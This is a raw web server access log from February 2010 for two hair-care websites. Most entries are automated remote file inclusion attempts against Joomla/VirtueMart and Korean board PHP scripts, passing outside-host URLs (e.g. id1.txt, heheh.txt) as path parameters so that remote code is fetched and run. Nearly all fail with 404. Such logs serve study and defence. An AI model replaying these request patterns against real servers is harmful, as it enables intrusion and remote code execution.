222.73.17.7 - - [08/Feb/2010:03:04:14 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:03:04:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.122.19.24 - - [08/Feb/2010:03:06:57 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
202.122.19.24 - - [08/Feb/2010:03:06:57 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
202.122.19.24 - - [08/Feb/2010:03:06:57 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
202.122.19.24 - - [08/Feb/2010:03:08:53 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.freehairsecrets.com"
202.122.19.24 - - [08/Feb/2010:03:08:53 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.freehairsecrets.com"
202.122.19.24 - - [08/Feb/2010:03:08:53 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:03:15:03 -0800] "GET /logs/access_091214.log%20%20//skin/zero_vote/error.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:03:15:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:03:15:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:03:15:48 -0800] "GET /logs/access_091123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:03:18:28 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:21:03 -0800] "GET /logs/access_100125.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:21:03 -0800] "GET /bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:21:03 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:03:21:40 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:03:22:19 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/mboh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:03:22:19 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/mboh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:03:22:24 -0800] "GET /bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/mboh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.94.213 - - [08/Feb/2010:03:22:49 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:23:19 -0800] "GET /logs/access_100111.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.213 - - [08/Feb/2010:03:23:51 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14202 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
220.181.94.213 - - [08/Feb/2010:03:24:02 -0800] "GET /freehairsecretsphp/viewtopic.php?p=1186 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:03:24:11 -0800] "GET /logs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:03:24:11 -0800] "GET //delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:03:24:11 -0800] "GET /logs/access.log%20%20///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.235 - - [08/Feb/2010:03:25:07 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.115.235 - - [08/Feb/2010:03:25:09 -0800] "GET /logs/access_090921.log HTTP/1.0" 200 748349 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:03:25:17 -0800] "GET //delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:03:25:17 -0800] "GET /logs///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:03:25:17 -0800] "GET /logs/access_100125.log%20%20///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:25:47 -0800] "GET /bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:25:47 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:25:47 -0800] "GET /logs/access_100125.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:26:30 -0800] "GET /logs/access_100125.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:26:30 -0800] "GET /bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:26:31 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:27:39 -0800] "GET /logs/access_100111.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:28:14 -0800] "GET /logs/access_100111.log%20%20//bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.115.235 - - [08/Feb/2010:03:30:34 -0800] "GET /logs/access_090914.log HTTP/1.0" 200 262144 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:03:42:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:03:42:50 -0800] "GET /logs/access_091123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:03:42:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:41 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:41 -0800] "GET /logs/access_100118.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:41 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:41 -0800] "GET /logs/access_100118.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:41 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:41 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:52 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:52 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Feb/2010:03:44:52 -0800] "GET /logs/access_100118.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:03:45:22 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:45:23 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:45:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.63.198.28 - - [08/Feb/2010:03:46:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "freehairsecrets.com"
66.103.128.44 - - [08/Feb/2010:03:47:15 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.103.128.44 - - [08/Feb/2010:03:47:15 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.103.128.44 - - [08/Feb/2010:03:47:15 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:21 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:26 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:26 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:28 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:28 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:28 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:45 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:45 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:03:48:45 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:03:49:33 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:03:49:39 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:03:50:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:03:50:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:03:50:21 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:03:50:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:03:50:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:03:50:24 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.247.222.83 - - [08/Feb/2010:03:56:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
61.247.222.83 - - [08/Feb/2010:03:56:15 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5027 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:03:59:42 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:03:59:42 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:03:59:42 -0800] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:04:01:56 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:04:01:56 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:04:01:56 -0800] "GET /logs/access_100118.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:04:02:00 -0800] "GET /logs/access_100111.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [08/Feb/2010:04:02:42 -0800] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://www.der-bunker.net/bank/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [08/Feb/2010:04:02:43 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://www.der-bunker.net/bank/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [08/Feb/2010:04:02:43 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.der-bunker.net/bank/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:03:39 -0800] "GET /logs/access_100118.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:03:39 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:03:39 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:04:05:14 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:04:05:18 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:04:05:18 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:05:22 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:05:22 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:05:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:22 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:22 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:38 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:38 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:38 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:58 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:58 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:07:58 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:08:01 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:08:01 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:08:01 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.36.36 - - [08/Feb/2010:04:08:38 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.der-bunker.net/bank/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
